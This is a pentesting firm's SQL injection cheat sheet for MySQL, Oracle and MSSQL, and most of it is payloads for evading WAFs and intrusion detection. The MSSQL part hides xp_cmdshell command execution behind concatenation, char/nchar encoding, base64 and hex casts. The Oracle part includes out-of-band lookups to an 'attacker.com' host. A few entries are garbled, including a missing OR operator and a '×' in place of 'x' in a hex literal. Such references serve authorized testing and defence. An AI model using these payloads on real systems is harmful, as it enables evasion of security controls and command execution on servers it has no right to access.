Obfuscating Queries

Obfuscating queries aids in bypassing Web Application Firewalls (WAFs) and Intrusion Detection/Prevention Systems (IDS/IPS). Below are examples of basic query obfuscations, they may require modification before being applied to certain injections.

Description Query
ASCII > Char SELECT char(65)
Char > ASCII SELECT ascii('A')
Hex SELECT 0x4A414B45
Hex > Int SELECT 0x20 + 0x40
Bitwise AND SELECT 6 & 2
Bitwise OR SELECT 6
Bitwise Negation SELECT ~6
Bitwise XOR SELECT 6 ^ 2
Right Shift SELECT 6>>2
Left Shift SELECT 6<<2
Substring SELECT substr('abcd', 3, 2)
substr(string, index, length)
Casting SELECT cast('1' AS unsigned integer)
SELECT cast('123' AS char)
Concatenation SELECT concat('net','spi')
SELECT 'n' 'et' 'spi'
No Quotes SELECT CONCAT(CHAR(74),CHAR(65),CHAR(75),CHAR(69))
Block comment SELECT/*block
comment*/"test"
Single line comment SELECT 1 -- comments out rest of line
SELECT 1 # comments out rest of line
No Spaces SELECT(username)FROM(USERS)WHERE(username='netspi')
Allowed Whitespaces 09, 0A, 0B, 0C, 0D, A0, 20
URL Encode SELECT%20%2A%20FROM%20USERS
Double URL Encode SELECT%2520%2A%2520FROM%2520USERS
Invalid Percent Encode %SEL%ECT * F%R%OM U%S%ERS

Further reading here

Obfuscating Queries

Obfuscating queries aids in bypassing Web Application Firewalls (WAFs) and Intrusion Detection/Prevention Systems (IDS/IPS). Below are examples of basic query obfuscations, they may require modification before being applied to certain injections.

Description Query
ASCII > Char SELECT char(65) from dual
Char > ASCII SELECT ascii('A') from dual
Bitwise AND SELECT 6 & 2 from dual
Bitwise OR SELECT 6 from dual
Bitwise Negation SELECT ~6 from dual
Bitwise XOR SELECT 6 ^ 2 from dual
Select Nth Char SELECT substr('abcd', 3, 1) FROM dual; -- Returns 3rd charcter, 'c'
Substring SELECT substr('abcd', 3, 2) from dual
substr(string, index, length)
Casting select CAST(12 AS CHAR(32)) from dual
Concatenation SELECT concat('net','spi') from dual
Comments SELECT 1 FROM dual -- comment
If statement BEGIN IF 1=1 THEN dbms_lock.sleep(3); ELSE dbms_lock.sleep(0); END IF;
Case Statement SELECT CASE WHEN 1=1 THEN 1 ELSE 2 END FROM dual; -- Returns 1
SELECT CASE WHEN 1=2 THEN 1 ELSE 2 END FROM dual; -- Returns 2
Time Delay BEGIN DBMS_LOCK.SLEEP(5); END; (Requires Privileges)
SELECT UTL_INADDR.get_host_name('10.0.0.1') FROM dual;
SELECT UTL_INADDR.get_host_address('blah.attacker.com') FROM dual;
SELECT UTL_HTTP.REQUEST('http://google.com') FROM dual;
Select Nth Row SELECT username FROM (SELECT ROWNUM r, username FROM all_users ORDER BY username) WHERE r=9; -- Returns 9th row
Bitwise AND SELECT bitand(6,2) FROM dual; -- Returns 2
SELECT bitand(6,1) FROM dual; -- Returns 0
String Concatenation SELECT 'A' || 'B' FROM dual; -- Returns AB
Avoiding Quotes SELECT chr(65) || chr(66) FROM dual; -- Returns AB
Hex Encoding SELECT 0x75736572 FROM dual;

Obfuscating Queries

Obfuscating queries aids in bypassing Web Application Firewalls (WAFs) and Intrusion Detection/Prevention Systems (IDS/IPS). Below are examples of basic query obfuscations, they may require modification before being applied to certain injections.

Description Query
ASCII > Char SELECT char(65)
Char > ASCII SELECT ascii('A')
Hex > Int SELECT 0x20 + 0x40
Bitwise AND SELECT 6 & 2
Bitwise OR SELECT 6
Bitwise Negation SELECT ~6
Bitwise XOR SELECT 6 ^ 2
Substring SELECT substring('abcd', 3, 2)
substring(string, index, length)
Casting SELECT cast('1' AS unsigned integer)
SELECT cast('123' AS char)
Concatenation SELECT concat('net','spi')
Comments SELECT 1 --comment
SELECT/*comment*/1
Avoiding Quotes SELECT char(65)+char(66) -- returns AB
Avoid semicolon with %0d %0dwaitfor+delay+'0:0:10'--
Bypass Case Filtering EXEC xP_cMdsheLL 'dir';
Avoid Spaces - With Comments EXEC/**/xp_cmdshell/**/'dir';--
';ex/**/ec xp_cmds/**/hell 'dir';
Avoid Query Detection - with concatenation DECLARE @cmd as varchar(3000);SET @cmd = 'x'+'p'+'_'+'c'+'m'+'d'+'s'+'h'+'e'+'l'+'l'+'/**/'+""+'d'+'i'+'r'+"";exec(@cmd);
Avoid Query Detection - Char Encoding DECLARE @cmd as varchar(3000);SET @cmd =(CHAR(101)+CHAR(120)+CHAR(101)+CHAR(99)+CHAR(32)+CHAR(109)+CHAR(97)+CHAR(115)+CHAR(116)+CHAR(101)+CHAR(114)+CHAR(46)+CHAR(46)+CHAR(120)+CHAR(112)+CHAR(95)+CHAR(99)+CHAR(109)+CHAR(100)+CHAR(115)+CHAR(104)+CHAR(101)+CHAR(108)+CHAR(108)+CHAR(32)+CHAR(39)+CHAR(100)+CHAR(105)+CHAR(114)+CHAR(39)+CHAR(59));EXEC(@cmd);
Avoid Query Detection - Base64 Encoding DECLARE @data varchar(max), @XmlData xml;SET @data = 'ZXhlYyBtYXN0ZXIuLnhwX2NtZHNoZWxsICdkaXIn';SET @XmlData = CAST('' + @data + '' as xml);SET @data = CONVERT(varchar(max), @XmlData.value('(data)[1]', 'varbinary(max)'));exec (@data);
Avoid Query Detection - Nchar Encoding DECLARE @cmd as nvarchar(3000);SET @cmd =(nchar(101)+nchar(120)+nchar(101)+nchar(99)+nchar(32)+nchar(109)+nchar(97)+nchar(115)+nchar(116)+nchar(101)+nchar(114)+nchar(46)+nchar(46)+nchar(120)+nchar(112)+nchar(95)+nchar(99)+nchar(109)+nchar(100)+nchar(115)+nchar(104)+nchar(101)+nchar(108)+nchar(108)+nchar(32)+nchar(39)+nchar(100)+nchar(105)+nchar(114)+nchar(39)+nchar(59));EXEC(@cmd);
Avoid Query Detection - Binary Encoded ASCII + CAST DECLARE @cmd as varchar(MAX);SET @cmd = cast(0x78705F636D647368656C6C202764697227 as varchar(MAX));exec(@cmd);
Avoid Query Detection - Binary Encoded ASCII + CONVERT DECLARE @cmd as varchar(MAX);SET @cmd = convert(varchar(MAX),0x78705F636D647368656C6C202764697227);exec(@cmd);
Avoid Query Detection - varbinary(MAX) DECLARE @cmd as varchar(MAX);SET @cmd = convert(varchar(0),0x78705F636D647368656C6C202764697227);exec(@cmd);
Avoid EXEC() - sp_sqlexec DECLARE @cmd as varchar(3000);SET @cmd = convert(varchar(0),0×78705F636D647368656C6C202764697227);exec sp_sqlexec @cmd;
Execute xp_cmdshell 'dir' DECLARE @tmp as varchar(MAX);
SET @tmp = char(88)+char(80)+char(95)+char(67)+char(77)+
char(68)+char(83)+char(72)+char(69)+char(76)+char(76);
exec @tmp 'dir';

© 2018 Copyright by NetSPI. All rights reserved.